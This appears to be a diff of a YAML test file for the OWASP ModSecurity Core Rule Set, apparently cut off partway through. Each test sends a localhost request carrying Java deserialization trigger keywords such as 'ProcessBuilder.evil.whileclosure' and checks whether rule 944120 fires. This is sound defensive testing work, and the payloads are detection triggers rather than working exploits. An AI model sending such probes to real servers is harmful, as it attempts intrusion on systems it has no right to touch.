"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-104 - desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-105 - desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-106 - desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-107 - desc: "XML element includes keyword 
ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-108 - desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-109 - desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-110 - desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-111 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-112 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-113 - desc: "Content-Type application/json arg value includes keyword 
ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-114 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-115 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: 
"-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-116 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-117 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; 
name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeserializationfactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-118 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeserializationfactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-119 - desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-120 - desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-121 - desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-122 - desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-123 - desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-124 - desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-125 - desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-126 - desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-127 - desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-128 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-129 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-130 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.whileclosure\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-131 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.whileclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-132 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity 
CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.whileclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-133 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.whileclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-134 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.whileclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-135 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.whileclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" +meta: + author: "spartantri" + enabled: true + name: "944120.yaml" + description: "Positive tests for rule 944120" +tests: + - test_title: 944120-1 + desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-2 + desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-3 + desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-4 + desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 
944120-5 + desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-6 + desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-7 + desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-8 + desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-9 + desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-10 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-11 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 